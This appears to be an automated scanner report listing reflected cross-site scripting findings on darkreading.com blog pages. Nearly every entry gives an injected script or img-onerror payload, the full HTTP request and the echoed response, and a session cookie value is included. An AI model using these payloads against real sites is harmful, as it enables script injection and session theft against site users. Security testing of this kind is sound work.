The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d4bdd'><img%20src%3da%20onerror%3dalert(1)>6c66d609c46 was submitted in the REST URL parameter 3. This input was echoed as d4bdd'><img src=a onerror=alert(1)>6c66d609c46 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700741/conquering-large-web-apps-with-solid-methodology.htmld4bdd'><img%20src%3da%20onerror%3dalert(1)>6c66d609c46 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c69"><a>a84db8a5ded was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700741/conquering-large-web-apps-with-solid-methodology.html78c69"><a>a84db8a5ded HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Conquerin ...[SNIP]... e-web-apps-with-solid-methodology.html78c69%22%3E%3Ca%3Ea84db8a5ded&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700741/conquering-large-web-apps-with-solid-methodology.html78c69"><a>a84db8a5ded"> ...[SNIP]...
3.242. http://www.darkreading.com/blog/227700741/conquering-large-web-apps-with-solid-methodology.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a76f1"><script>alert(1)</script>ee9f8702759 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700741/conquering-large-web-apps-with-solid-methodology.html?a76f1"><script>alert(1)</script>ee9f8702759=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13d77"><a>2cbc575524c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770076613d77"><a>2cbc575524c/embedded-systems-can-mean-embedded-vulnerabilities.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c2a55'><img%20src%3da%20onerror%3dalert(1)>afc3d5dad04 was submitted in the REST URL parameter 3. This input was echoed as c2a55'><img src=a onerror=alert(1)>afc3d5dad04 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700766/embedded-systems-can-mean-embedded-vulnerabilities.htmlc2a55'><img%20src%3da%20onerror%3dalert(1)>afc3d5dad04 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bd6a"><a>336c30562b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700766/embedded-systems-can-mean-embedded-vulnerabilities.html1bd6a"><a>336c30562b HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Embedded ...[SNIP]... an-mean-embedded-vulnerabilities.html1bd6a%22%3E%3Ca%3E336c30562b&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700766/embedded-systems-can-mean-embedded-vulnerabilities.html1bd6a"><a>336c30562b"> ...[SNIP]...
3.246. http://www.darkreading.com/blog/227700766/embedded-systems-can-mean-embedded-vulnerabilities.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bfae"><script>alert(1)</script>3faffb1ab32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700766/embedded-systems-can-mean-embedded-vulnerabilities.html?4bfae"><script>alert(1)</script>3faffb1ab32=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c015"><a>e27f48a9bb6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/2277007671c015"><a>e27f48a9bb6/protecting-ssh-from-the-masses.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98375"><a>0376f620246 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700767/protecting-ssh-from-the-masses.html98375"><a>0376f620246 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c92cc'><img%20src%3da%20onerror%3dalert(1)>40ae49939b8 was submitted in the REST URL parameter 3. This input was echoed as c92cc'><img src=a onerror=alert(1)>40ae49939b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700767/protecting-ssh-from-the-masses.htmlc92cc'><img%20src%3da%20onerror%3dalert(1)>40ae49939b8 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a63d9"><script>alert(1)</script>07686a3153c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700767/protecting-ssh-from-the-masses.html?a63d9"><script>alert(1)</script>07686a3153c=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ddd1"><a>68737eaed8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/2277007952ddd1"><a>68737eaed8b/there-s-a-recipe-for-that.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1528"><a>d8790268ec9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700795/there-s-a-recipe-for-that.htmla1528"><a>d8790268ec9 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4a40f'><img%20src%3da%20onerror%3dalert(1)>541884546d7 was submitted in the REST URL parameter 3. This input was echoed as 4a40f'><img src=a onerror=alert(1)>541884546d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700795/there-s-a-recipe-for-that.html4a40f'><img%20src%3da%20onerror%3dalert(1)>541884546d7 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>There's A ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/blog/227700795/there-s-a-recipe-for-that.html4a40f'><img src=a onerror=alert(1)>541884546d7'> ...[SNIP]...
3.254. http://www.darkreading.com/blog/227700795/there-s-a-recipe-for-that.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/227700795/there-s-a-recipe-for-that.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e15"><script>alert(1)</script>4ceb75b613c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700795/there-s-a-recipe-for-that.html?38e15"><script>alert(1)</script>4ceb75b613c=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>There's A ...[SNIP]... -recipe-for-that.html%3F38e15%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4ceb75b613c%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700795/there-s-a-recipe-for-that.html?38e15"><script>alert(1)</script>4ceb75b613c=1"> ...[SNIP]...
3.255. http://www.darkreading.com/blog/227700800/security-s-top-4-social-engineers-of-all-time.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3970"><script>alert(1)</script>a342622570b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700800/security-s-top-4-social-engineers-of-all-time.html?b3970"><script>alert(1)</script>a342622570b=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ff7b"><a>ca4efdb6016 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/2277008261ff7b"><a>ca4efdb6016/taking-usb-attacks-to-the-next-level.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3836'><img%20src%3da%20onerror%3dalert(1)>b3c8bd6678a was submitted in the REST URL parameter 3. This input was echoed as e3836'><img src=a onerror=alert(1)>b3c8bd6678a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700826/taking-usb-attacks-to-the-next-level.htmle3836'><img%20src%3da%20onerror%3dalert(1)>b3c8bd6678a HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf5f2"><a>cb6b769c644 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700826/taking-usb-attacks-to-the-next-level.htmlcf5f2"><a>cb6b769c644 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Taking US ...[SNIP]... 700826%2Ftaking-usb-attacks-to-the-next-level.htmlcf5f2%22%3E%3Ca%3Ecb6b769c644&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700826/taking-usb-attacks-to-the-next-level.htmlcf5f2"><a>cb6b769c644"> ...[SNIP]...
3.259. http://www.darkreading.com/blog/227700826/taking-usb-attacks-to-the-next-level.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caf00"><script>alert(1)</script>94fc87cc10c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700826/taking-usb-attacks-to-the-next-level.html?caf00"><script>alert(1)</script>94fc87cc10c=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91090"><a>49796f5fff6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770083091090"><a>49796f5fff6/detection-and-defense-of-windows-autorun-locations.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3c98'><img%20src%3da%20onerror%3dalert(1)>6a346b599e3 was submitted in the REST URL parameter 3. This input was echoed as f3c98'><img src=a onerror=alert(1)>6a346b599e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700830/detection-and-defense-of-windows-autorun-locations.htmlf3c98'><img%20src%3da%20onerror%3dalert(1)>6a346b599e3 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe004"><a>aa13ea4dc8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700830/detection-and-defense-of-windows-autorun-locations.htmlfe004"><a>aa13ea4dc8e HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Detection ...[SNIP]... se-of-windows-autorun-locations.htmlfe004%22%3E%3Ca%3Eaa13ea4dc8e&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700830/detection-and-defense-of-windows-autorun-locations.htmlfe004"><a>aa13ea4dc8e"> ...[SNIP]...
3.263. http://www.darkreading.com/blog/227700830/detection-and-defense-of-windows-autorun-locations.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c69"><script>alert(1)</script>6c14533190f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700830/detection-and-defense-of-windows-autorun-locations.html?61c69"><script>alert(1)</script>6c14533190f=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73c13"><a>ee3e558c789 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770083273c13"><a>ee3e558c789/make-security-about-security-not-compliance.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f05af'><img%20src%3da%20onerror%3dalert(1)>e3cd043ab65 was submitted in the REST URL parameter 3. This input was echoed as f05af'><img src=a onerror=alert(1)>e3cd043ab65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700832/make-security-about-security-not-compliance.htmlf05af'><img%20src%3da%20onerror%3dalert(1)>e3cd043ab65 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d07bc"><a>561a5bd8b2b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700832/make-security-about-security-not-compliance.htmld07bc"><a>561a5bd8b2b HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Make Secu ...[SNIP]... security-about-security-not-compliance.htmld07bc%22%3E%3Ca%3E561a5bd8b2b&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700832/make-security-about-security-not-compliance.htmld07bc"><a>561a5bd8b2b"> ...[SNIP]...
3.267. http://www.darkreading.com/blog/227700832/make-security-about-security-not-compliance.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3167a"><script>alert(1)</script>71a55e6c014 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700832/make-security-about-security-not-compliance.html?3167a"><script>alert(1)</script>71a55e6c014=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72025"><a>d646fd5dfe9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770083572025"><a>d646fd5dfe9/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
